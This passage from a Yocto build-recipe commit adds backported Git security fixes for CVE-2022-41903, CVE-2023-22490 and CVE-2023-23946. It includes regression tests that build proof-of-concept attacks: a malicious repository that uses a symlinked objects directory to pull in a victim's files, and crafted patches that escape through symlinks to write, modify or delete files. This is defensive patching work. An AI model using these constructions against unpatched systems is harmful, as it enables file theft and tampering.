+rather fragile and is hard to understand at times. Refactor the code to
+instead use `strbuf_add` and `strbuf_addstr` so that we can be sure that
+there is no possibility to perform an out-of-bounds write.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f930a2394303b902e2973f4308f96529f736b8bc]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ utf8.c | 34 +++++++++++++---------------------
+ 1 file changed, 13 insertions(+), 21 deletions(-)
+
+diff --git a/utf8.c b/utf8.c
+index ec03e69..a13f5e3 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -365,26 +365,20 @@ void strbuf_add_wrapped_bytes(struct strbuf *buf, const char *data, int len,
+ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ const char *subst)
+ {
+- struct strbuf sb_dst = STRBUF_INIT;
+- char *src = sb_src->buf;
+- char *end = src + sb_src->len;
+- char *dst;
+- int w = 0, subst_len = 0;
++ const char *src = sb_src->buf, *end = sb_src->buf + sb_src->len;
++ struct strbuf dst;
++ int w = 0;
+
+- if (subst)
+- subst_len = strlen(subst);
+- strbuf_grow(&sb_dst, sb_src->len + subst_len);
+- dst = sb_dst.buf;
++ strbuf_init(&dst, sb_src->len);
+
+ while (src < end) {
++ const char *old;
+ int glyph_width;
+- char *old;
+ size_t n;
+
+ while ((n = display_mode_esc_sequence_len(src))) {
+- memcpy(dst, src, n);
++ strbuf_add(&dst, src, n);
+ src += n;
+- dst += n;
+ }
+
+ if (src >= end)
+@@ -404,21 +398,19 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+
+ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+- memcpy(dst, subst, subst_len);
+- dst += subst_len;
++ strbuf_addstr(&dst, subst);
+ subst = NULL;
+ }
+- w += glyph_width;
+- continue;
++ } else {
++ strbuf_add(&dst, old, src - old);
+ }
+- memcpy(dst, old, src - old);
+- dst += src - old;
++
+ w += glyph_width;
+ }
+- strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+- strbuf_swap(sb_src, &sb_dst);
++
++ strbuf_swap(sb_src, &dst);
+ out:
+- strbuf_release(&sb_dst);
++ strbuf_release(&dst);
+ }
+
+ /*
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
new file mode 100644
index 0000000000..978865978d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
@@ -0,0 +1,124 @@
+From 304a50adff6480ede46b68f7545baab542cbfb46 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:23 +0100
+Subject: [PATCH 12/12] pretty: restrict input lengths for padding and wrapping formats
+
+Both the padding and wrapping formatting directives allow the caller to
+specify an integer that ultimately leads to us adding this many chars to
+the result buffer. As a consequence, it is trivial to e.g. allocate 2GB
+of RAM via a single formatting directive and cause resource exhaustion
+on the machine executing this logic. Furthermore, it is debatable
+whether there are any sane usecases that require the user to pad data to
+2GB boundaries or to indent wrapped data by 2GB.
+
+Restrict the input sizes to 16 kilobytes at a maximum to limit the
+amount of bytes that can be requested by the user. This is not meant
+as a fix because there are ways to trivially amplify the amount of
+data we generate via formatting directives; the real protection is
+achieved by the changes in previous steps to catch and avoid integer
+wraparound that causes us to under-allocate and access beyond the
+end of allocated memory reagions. But having such a limit
+significantly helps fuzzing the pretty format, because the fuzzer is
+otherwise quite fast to run out-of-memory as it discovers these
+formatters.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/304a50adff6480ede46b68f7545baab542cbfb46]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 26 ++++++++++++++++++++++++++
+ t/t4205-log-pretty-formats.sh | 24 +++++++++++++++---------
+ 2 files changed, 41 insertions(+), 9 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index c3c1443..e9687f0 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -13,6 +13,13 @@
+ #include "gpg-interface.h"
+ #include "trailer.h"
+
++/*
++ * The limit for formatting directives, which enable the caller to append
++ * arbitrarily many bytes to the formatted buffer. This includes padding
++ * and wrapping formatters.
++ */
++#define FORMATTING_LIMIT (16 * 1024)
++
+ static char *user_format;
+ static struct cmt_fmt_map {
+ const char *name;
+@@ -1029,6 +1036,15 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
++
++ /*
++ * We need to limit the amount of padding, or otherwise this
++ * would allow the user to pad the buffer by arbitrarily many
++ * bytes and thus cause resource exhaustion.
++ */
++ if (width < -FORMATTING_LIMIT || width > FORMATTING_LIMIT)
++ return 0;
++
+ if (next == start || width == 0)
+ return 0;
+ if (width < 0) {
+@@ -1188,6 +1204,16 @@ static size_t format_commit_one(struct strbuf *sb, /* in UTF-8 */
+ if (*next != ')')
+ return 0;
+ }
++
++ /*
++ * We need to limit the format here as it allows the
++ * user to prepend arbitrarily many bytes to the buffer
++ * when rewrapping.
++ */
++ if (width > FORMATTING_LIMIT ||
++ indent1 > FORMATTING_LIMIT ||
++ indent2 > FORMATTING_LIMIT)
++ return 0;
+ rewrap_message_tail(sb, c, width, indent1, indent2);
+ return end - placeholder + 1;
+ } else
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 52c8bc8..572d02f 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -809,15 +809,21 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ '
+
+ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
+- cat >expect <<-EOF &&
+- fatal: number too large to represent as int on this platform: 2147483649
+- EOF
+- test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
+- test_cmp expect error
++ printf "%%w(2147483649,1,1)0" >expect &&
++ git log -1 --pretty="format:%w(2147483649,1,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,2147483649,1)0" >expect &&
++ git log -1 --pretty="format:%w(1,2147483649,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,1,2147483649)0" >expect &&
++ git log -1 --pretty="format:%w(1,1,2147483649)%x30" >actual &&
++ test_cmp expect actual
++'
++
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing padding directive' '
++ printf "%%<(2147483649)0" >expect &&
++ git log -1 --pretty="format:%<(2147483649)%x30" >actual &&
++ test_cmp expect actual
+ '
+
+ test_expect_success 'log --pretty with padding and preceding control chars' '
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
new file mode 100644
index 0000000000..cc9b448c5c
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
@@ -0,0 +1,179 @@
+From 58325b93c5b6212697b088371809e9948fee8052 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:45 -0500
+Subject: [PATCH 1/3] t5619: demonstrate clone_local() with ambiguous transport
+
+When cloning a repository, Git must determine (a) what transport
+mechanism to use, and (b) whether or not the clone is local.
+
+Since f38aa83 (use local cloning if insteadOf makes a local URL,
+2014-07-17), the latter check happens after the remote has been
+initialized, and references the remote's URL instead of the local path.
+This is done to make it possible for a `url.<base>.insteadOf` rule to
+convert a remote URL into a local one, in which case the `clone_local()`
+mechanism should be used.
+
+However, with a specially crafted repository, Git can be tricked into
+using a non-local transport while still setting `is_local` to "1" and
+using the `clone_local()` optimization. The below test case
+demonstrates such an instance, and shows that it can be used to include
+arbitrary (known) paths in the working copy of a cloned repository on a
+victim's machine[^1], even if local file clones are forbidden by
+`protocol.file.allow`.
+
+This happens in a few parts:
+
+ 1. We first call `get_repo_path()` to see if the remote is a local
+ path. If it is, we replace the repo name with its absolute path.
+
+ 2. We then call `transport_get()` on the repo name and decide how to
+ access it. If it was turned into an absolute path in the previous
+ step, then we should always treat it like a file.
+
+ 3. We use `get_repo_path()` again, and set `is_local` as appropriate.
+ But it's already too late to rewrite the repo name as an absolute
+ path, since we've already fed it to the transport code.
+
+The attack works by including a submodule whose URL corresponds to a
+path on disk. In the below example, the repository "sub" is reachable
+via the dumb HTTP protocol at (something like):
+
+ http://127.0.0.1:NNNN/dumb/sub.git
+
+However, the path "http:/127.0.0.1:NNNN/dumb" (that is, a top-level
+directory called "http:", then nested directories "127.0.0.1:NNNN", and
+"dumb") exists within the repository, too.
+
+To determine this, it first picks the appropriate transport, which is
+dumb HTTP. It then uses the remote's URL in order to determine whether
+the repository exists locally on disk. However, the malicious repository
+also contains an embedded stub repository which is the target of a
+symbolic link at the local path corresponding to the "sub" repository on
+disk (i.e., there is a symbolic link at "http:/127.0.0.1/dumb/sub.git",
+pointing to the stub repository via ".git/modules/sub/../../../repo").
+
+This stub repository fools Git into thinking that a local repository
+exists at that URL and thus can be cloned locally. The affected call is
+in `get_repo_path()`, which in turn calls `get_repo_path_1()`, which
+locates a valid repository at that target.
+
+This then causes Git to set the `is_local` variable to "1", and in turn
+instructs Git to clone the repository using its local clone optimization
+via the `clone_local()` function.
+
+The exploit comes into play because the stub repository's top-level
+"$GIT_DIR/objects" directory is a symbolic link which can point to an
+arbitrary path on the victim's machine. `clone_local()` resolves the
+top-level "objects" directory through a `stat(2)` call, meaning that we
+read through the symbolic link and copy or hardlink the directory
+contents at the destination of the link.
+
+In other words, we can get steps (1) and (3) to disagree by leveraging
+the dangling symlink to pick a non-local transport in the first step,
+and then set is_local to "1" in the third step when cloning with
+`--separate-git-dir`, which makes the symlink non-dangling.
+
+This can result in data-exfiltration on the victim's machine when
+sensitive data is at a known path (e.g., "/home/$USER/.ssh").
+
+The appropriate fix is two-fold:
+
+ - Resolve the transport later on (to avoid using the local
+ clone optimization with a non-local transport).
+
+ - Avoid reading through the top-level "objects" directory when
+ (correctly) using the clone_local() optimization.
+
+This patch merely demonstrates the issue. The following two patches will
+implement each part of the above fix, respectively.
+
+[^1]: Provided that any target directory does not contain symbolic
+ links, in which case the changes from 6f054f9 (builtin/clone.c:
+ disallow `--local` clones with symlinks, 2022-07-28) will abort the
+ clone.
+
+Reported-by: yvvdwf <yvvdwf@gmail.com>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/58325b93c5b6212697b088371809e9948fee8052]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t5619-clone-local-ambiguous-transport.sh | 63 ++++++++++++++++++++++
+ 1 file changed, 63 insertions(+)
+ create mode 100644 t/t5619-clone-local-ambiguous-transport.sh
+
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+new file mode 100644
+index 0000000..7ebd31a
+--- /dev/null
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -0,0 +1,63 @@
++#!/bin/sh
++
++test_description='test local clone with ambiguous transport'
++
++. ./test-lib.sh
++. "$TEST_DIRECTORY/lib-httpd.sh"
++
++if ! test_have_prereq SYMLINKS
++then
++ skip_all='skipping test, symlink support unavailable'
++ test_done
++fi
++
++start_httpd
++
++REPO="$HTTPD_DOCUMENT_ROOT_PATH/sub.git"
++URI="$HTTPD_URL/dumb/sub.git"
++
++test_expect_success 'setup' '
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/secret &&
++
++ git init --bare "$REPO" &&
++ test_commit_bulk -C "$REPO" --ref=main 1 &&
++
++ git -C "$REPO" update-ref HEAD main &&
++ git -C "$REPO" update-server-info &&
++
++ git init malicious &&
++ (
++ cd malicious &&
++
++ git submodule add "$URI" &&
++
++ mkdir -p repo/refs &&
++ touch repo/refs/.gitkeep &&
++ printf "ref: refs/heads/a" >repo/HEAD &&
++ ln -s "$(cd .. && pwd)/sensitive" repo/objects &&
++
++ mkdir -p "$HTTPD_URL/dumb" &&
++ ln -s "../../../.git/modules/sub/../../../repo/" "$URI" &&
++
++ git add . &&
++ git commit -m "initial commit"
++ ) &&
++
++ # Delete all of the references in our malicious submodule to
++ # avoid the client attempting to checkout any objects (which
++ # will be missing, and thus will cause the clone to fail before
++ # we can trigger the exploit).
++ git -C "$REPO" for-each-ref --format="delete %(refname)" >in &&
++ git -C "$REPO" update-ref --stdin <in &&
++ git -C "$REPO" update-server-info
++'
++
++test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++ git clone malicious clone &&
++ git -C clone submodule update --init &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret
++'
++
++test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
new file mode 100644
index 0000000000..0b5b40f827
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
@@ -0,0 +1,122 @@
+From cf8f6ce02a13f4d1979a53241afbee15a293fce9 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:48 -0500
+Subject: [PATCH 2/3] clone: delay picking a transport until after get_repo_path()
+
+In the previous commit, t5619 demonstrates an issue where two calls to
+`get_repo_path()` could trick Git into using its local clone mechanism
+in conjunction with a non-local transport.
+
+That sequence is:
+
+ - the starting state is that the local path https:/example.com/foo is a
+ symlink that points to ../../../.git/modules/foo. So it's dangling.
+
+ - get_repo_path() sees that no such path exists (because it's
+ dangling), and thus we do not canonicalize it into an absolute path
+
+ - because we're using --separate-git-dir, we create .git/modules/foo.
+ Now our symlink is no longer dangling!
+
+ - we pass the url to transport_get(), which sees it as an https URL.
+
+ - we call get_repo_path() again, on the url. This second call was
+ introduced by f38aa83 (use local cloning if insteadOf makes a
+ local URL, 2014-07-17). The idea is that we want to pull the url
+ fresh from the remote.c API, because it will apply any aliases.
+
+And of course now it sees that there is a local file, which is a
+mismatch with the transport we already selected.
+
+The issue in the above sequence is calling `transport_get()` before
+deciding whether or not the repository is indeed local, and not passing
+in an absolute path if it is local.
+
+This is reminiscent of a similar bug report in [1], where it was
+suggested to perform the `insteadOf` lookup earlier. Taking that
+approach may not be as straightforward, since the intent is to store the
+original URL in the config, but to actually fetch from the insteadOf
+one, so conflating the two early on is a non-starter.
+
+Note: we pass the path returned by `get_repo_path(remote->url[0])`,
+which should be the same as `repo_name` (aside from any `insteadOf`
+rewrites).
+
+We *could* pass `absolute_pathdup()` of the same argument, which
+86521ac (Bring local clone's origin URL in line with that of a remote
+clone, 2008-09-01) indicates may differ depending on the presence of
+".git/" for a non-bare repo. That matters for forming relative submodule
+paths, but doesn't matter for the second call, since we're just feeding
+it to the transport code, which is fine either way.
+
+[1]: https://lore.kernel.org/git/CAMoD=Bi41mB3QRn3JdZL-FGHs4w3C2jGpnJB-CqSndO7FMtfzA@mail.gmail.com/
+
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/cf8f6ce02a13f4d1979a53241afbee15a293fce9]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ builtin/clone.c | 8 ++++----
+ t/t5619-clone-local-ambiguous-transport.sh | 15 +++++++++++----
+ 2 files changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/builtin/clone.c b/builtin/clone.c
+index 53e04b1..b57e703 100644
+--- a/builtin/clone.c
++++ b/builtin/clone.c
+@@ -1112,10 +1112,6 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ branch_top.buf);
+ refspec_append(&remote->fetch, default_refspec.buf);
+
+- transport = transport_get(remote, remote->url[0]);
+- transport_set_verbosity(transport, option_verbosity, option_progress);
+- transport->family = family;
+-
+ path = get_repo_path(remote->url[0], &is_bundle);
+ is_local = option_local != 0 && path && !is_bundle;
+ if (is_local) {
+@@ -1135,6 +1131,10 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ }
+ if (option_local > 0 && !is_local)
+ warning(_("--local is ignored"));
++
++ transport = transport_get(remote, path ? path : remote->url[0]);
++ transport_set_verbosity(transport, option_verbosity, option_progress);
++ transport->family = family;
+ transport->cloning = 1;
+
+ transport_set_option(transport, TRANS_OPT_KEEP, "yes");
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+index 7ebd31a..cce62bf 100644
+--- a/t/t5619-clone-local-ambiguous-transport.sh
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -53,11 +53,18 @@ test_expect_success 'setup' '
+ git -C "$REPO" update-server-info
+ '
+
+-test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++test_expect_success 'ambiguous transport does not lead to arbitrary file-inclusion' '
+ git clone malicious clone &&
+- git -C clone submodule update --init &&
+-
+- test_path_is_missing clone/.git/modules/sub/objects/secret
++ test_must_fail git -C clone submodule update --init 2>err &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret &&
++ # We would actually expect "transport .file. not allowed" here,
++ # but due to quirks of the URL detection in Git, we mis-parse
++ # the absolute path as a bogus URL and die before that step.
++ #
++ # This works for now, and if we ever fix the URL detection, it
++ # is OK to change this to detect the transport error.
++ grep "protocol .* is not supported" err
+ '
+
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
new file mode 100644
index 0000000000..08fb7f840b
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
@@ -0,0 +1,154 @@
+From bffc762f87ae8d18c6001bf0044a76004245754c Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:51 -0500
+Subject: [PATCH 3/3] dir-iterator: prevent top-level symlinks without FOLLOW_SYMLINKS
+
+When using the dir_iterator API, we first stat(2) the base path, and
+then use that as a starting point to enumerate the directory's contents.
+
+If the directory contains symbolic links, we will immediately die() upon
+encountering them without the `FOLLOW_SYMLINKS` flag. The same is not
+true when resolving the top-level directory, though.
+
+As explained in a previous commit, this oversight in 6f054f9
+(builtin/clone.c: disallow `--local` clones with symlinks, 2022-07-28)
+can be used as an attack vector to include arbitrary files on a victim's
+filesystem from outside of the repository.
+
+Prevent resolving top-level symlinks unless the FOLLOW_SYMLINKS flag is
+given, which will cause clones of a repository with a symlink'd
+"$GIT_DIR/objects" directory to fail.
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/bffc762f87ae8d18c6001bf0044a76004245754c]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dir-iterator.c | 13 +++++++++----
+ dir-iterator.h | 5 +++++
+ t/t0066-dir-iterator.sh | 27 ++++++++++++++++++++++++++-
+ t/t5604-clone-reference.sh | 16 ++++++++++++++++
+ 4 files changed, 56 insertions(+), 5 deletions(-)
+
+diff --git a/dir-iterator.c b/dir-iterator.c
+index b17e9f9..3764dd8 100644
+--- a/dir-iterator.c
++++ b/dir-iterator.c
+@@ -203,7 +203,7 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ {
+ struct dir_iterator_int *iter = xcalloc(1, sizeof(*iter));
+ struct dir_iterator *dir_iterator = &iter->base;
+- int saved_errno;
++ int saved_errno, err;
+
+ strbuf_init(&iter->base.path, PATH_MAX);
+ strbuf_addstr(&iter->base.path, path);
+@@ -213,10 +213,15 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ iter->flags = flags;
+
+ /*
+- * Note: stat already checks for NULL or empty strings and
+- * inexistent paths.
++ * Note: stat/lstat already checks for NULL or empty strings and
++ * nonexistent paths.
+ */
+- if (stat(iter->base.path.buf, &iter->base.st) < 0) {
++ if (iter->flags & DIR_ITERATOR_FOLLOW_SYMLINKS)
++ err = stat(iter->base.path.buf, &iter->base.st);
++ else
++ err = lstat(iter->base.path.buf, &iter->base.st);
++
++ if (err < 0) {
+ saved_errno = errno;
+ goto error_out;
+ }
+diff --git a/dir-iterator.h b/dir-iterator.h
+index 0822915..e3b6ff2 100644
+--- a/dir-iterator.h
++++ b/dir-iterator.h
+@@ -61,6 +61,11 @@
+ * not the symlinks themselves, which is the default behavior. Broken
+ * symlinks are ignored.
+ *
++ * Note: setting DIR_ITERATOR_FOLLOW_SYMLINKS affects resolving the
++ * starting path as well (e.g., attempting to iterate starting at a
++ * symbolic link pointing to a directory without FOLLOW_SYMLINKS will
++ * result in an error).
++ *
+ * Warning: circular symlinks are also followed when
+ * DIR_ITERATOR_FOLLOW_SYMLINKS is set. The iteration may end up with
+ * an ELOOP if they happen and DIR_ITERATOR_PEDANTIC is set.
+diff --git a/t/t0066-dir-iterator.sh b/t/t0066-dir-iterator.sh
+index 92910e4..c826f60 100755
+--- a/t/t0066-dir-iterator.sh
++++ b/t/t0066-dir-iterator.sh
+@@ -109,7 +109,9 @@ test_expect_success SYMLINKS 'setup dirs with symlinks' '
+ mkdir -p dir5/a/c &&
+ ln -s ../c dir5/a/b/d &&
+ ln -s ../ dir5/a/b/e &&
+- ln -s ../../ dir5/a/b/f
++ ln -s ../../ dir5/a/b/f &&
++
++ ln -s dir4 dir6
+ '
+
+ test_expect_success SYMLINKS 'dir-iterator should not follow symlinks by default' '
+@@ -145,4 +147,27 @@ test_expect_success SYMLINKS 'dir-iterator should follow symlinks w/ follow flag
+ test_cmp expected-follow-sorted-output actual-follow-sorted-output
+ '
+
++test_expect_success SYMLINKS 'dir-iterator does not resolve top-level symlinks' '
++ test_must_fail test-tool dir-iterator ./dir6 >out &&
++
++ grep "ENOTDIR" out
++'
++
++test_expect_success SYMLINKS 'dir-iterator resolves top-level symlinks w/ follow flag' '
++ cat >expected-follow-sorted-output <<-EOF &&
++ [d] (a) [a] ./dir6/a
++ [d] (a/f) [f] ./dir6/a/f
++ [d] (a/f/c) [c] ./dir6/a/f/c
++ [d] (b) [b] ./dir6/b
++ [d] (b/c) [c] ./dir6/b/c
++ [f] (a/d) [d] ./dir6/a/d
++ [f] (a/e) [e] ./dir6/a/e
++ EOF
++
++ test-tool dir-iterator --follow-symlinks ./dir6 >out &&
++ sort out >actual-follow-sorted-output &&
++
++ test_cmp expected-follow-sorted-output actual-follow-sorted-output
++'
++
+ test_done
+diff --git a/t/t5604-clone-reference.sh b/t/t5604-clone-reference.sh
+index 4894237..615b981 100755
+--- a/t/t5604-clone-reference.sh
++++ b/t/t5604-clone-reference.sh
+@@ -354,4 +354,20 @@ test_expect_success SYMLINKS 'clone repo with symlinked or unknown files at obje
+ test_must_be_empty T--shared.objects-symlinks.raw
+ '
+
++test_expect_success SYMLINKS 'clone repo with symlinked objects directory' '
++ test_when_finished "rm -fr sensitive malicious" &&
++
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/file &&
++
++ git init malicious &&
++ rm -fr malicious/.git/objects &&
++ ln -s "$(pwd)/sensitive" ./malicious/.git/objects &&
++
++ test_must_fail git clone --local malicious clone 2>err &&
++
++ test_path_is_missing clone &&
++ grep "failed to start iterator over" err
++'
++
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-23946.patch b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
new file mode 100644
index 0000000000..3629ff57b2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
@@ -0,0 +1,184 @@
+From fade728df1221598f42d391cf377e9e84a32053f Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 2 Feb 2023 11:54:34 +0100
+Subject: [PATCH] apply: fix writing behind newly created symbolic links
+
+When writing files git-apply(1) initially makes sure that none of the
+files it is about to create are behind a symlink:
+
+```
+ $ git init repo
+ Initialized empty Git repository in /tmp/repo/.git/
+ $ cd repo/
+ $ ln -s dir symlink
+ $ git apply - <<EOF
+ diff --git a/symlink/file b/symlink/file
+ new file mode 100644
+ index 0000000..e69de29
+ EOF
+ error: affected file 'symlink/file' is beyond a symbolic link
+```
+
+This safety mechanism is crucial to ensure that we don't write outside
+of the repository's working directory. It can be fooled though when the
+patch that is being applied creates the symbolic link in the first
+place, which can lead to writing files in arbitrary locations.
+
+Fix this by checking whether the path we're about to create is
+beyond a symlink or not. Tightening these checks like this should be
+fine as we already have these precautions in Git as explained
+above. Ideally, we should update the check we do up-front before
+starting to reflect the computed changes to the working tree so that
+we catch this case as well, but as part of embargoed security work,
+adding an equivalent check just before we try to write out a file
+should serve us well as a reasonable first step.
+
+Digging back into history shows that this vulnerability has existed
+since at least Git v2.9.0. As Git v2.8.0 and older don't build on my
+system anymore I cannot tell whether older versions are affected, as
+well.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/fade728df1221598f42d391cf377e9e84a32053f]
+CVE: CVE-2023-23946
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ apply.c | 27 ++++++++++++++
+ t/t4115-apply-symlink.sh | 81 ++++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 108 insertions(+)
+
+diff --git a/apply.c b/apply.c
+index f8a046a..4f303bf 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4373,6 +4373,33 @@ static int create_one_file(struct apply_state *state,
+ if (state->cached)
+ return 0;
+
++ /*
++ * We already try to detect whether files are beyond a symlink in our
++ * up-front checks. But in the case where symlinks are created by any
++ * of the intermediate hunks it can happen that our up-front checks
++ * didn't yet see the symlink, but at the point of arriving here there
++ * in fact is one. We thus repeat the check for symlinks here.
++ *
++ * Note that this does not make the up-front check obsolete as the
++ * failure mode is different:
++ *
++ * - The up-front checks cause us to abort before we have written
++ * anything into the working directory. So when we exit this way the
++ * working directory remains clean.
++ *
++ * - The checks here happen in the middle of the action where we have
++ * already started to apply the patch. The end result will be a dirty
++ * working directory.
++ *
++ * Ideally, we should update the up-front checks to catch what would
++ * happen when we apply the patch before we damage the working tree.
++ * We have all the information necessary to do so. But for now, as a
++ * part of embargoed security work, having this check would serve as a
++ * reasonable first step.
++ */
++ if (path_is_beyond_symlink(state, path))
++ return error(_("affected file '%s' is beyond a symbolic link"), path);
++
+ res = try_create_file(state, path, mode, buf, size);
+ if (res < 0)
+ return -1;
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 872fcda..1acb7b2 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -44,4 +44,85 @@ test_expect_success 'apply --index symlink patch' '
+
+ '
+
++test_expect_success 'symlink setup' '
++ ln -s .git symlink &&
++ git add symlink &&
++ git commit -m "add symlink"
++'
++
++test_expect_success SYMLINKS 'symlink escape when creating new files' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git /dev/null b/renamed-symlink/create-me
++ new file mode 100644
++ index 0000000..039727e
++ --- /dev/null
++ +++ b/renamed-symlink/create-me
++ @@ -0,0 +1,1 @@
++ +busted
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: affected file ${SQ}renamed-symlink/create-me${SQ} is beyond a symbolic link
++ EOF
++ test_cmp expected_stderr stderr &&
++ ! test_path_exists .git/create-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when modifying file' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++ touch .git/modify-me &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git a/renamed-symlink/modify-me b/renamed-symlink/modify-me
++ index 1111111..2222222 100644
++ --- a/renamed-symlink/modify-me
++ +++ b/renamed-symlink/modify-me
++ @@ -0,0 +1,1 @@
++ +busted
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: renamed-symlink/modify-me: No such file or directory
++ EOF
++ test_cmp expected_stderr stderr &&
++ test_must_be_empty .git/modify-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when deleting file' '
++ test_when_finished "git reset --hard && git clean -dfx && rm .git/delete-me" &&
++ touch .git/delete-me &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git a/renamed-symlink/delete-me b/renamed-symlink/delete-me
++ deleted file mode 100644
++ index 1111111..0000000 100644
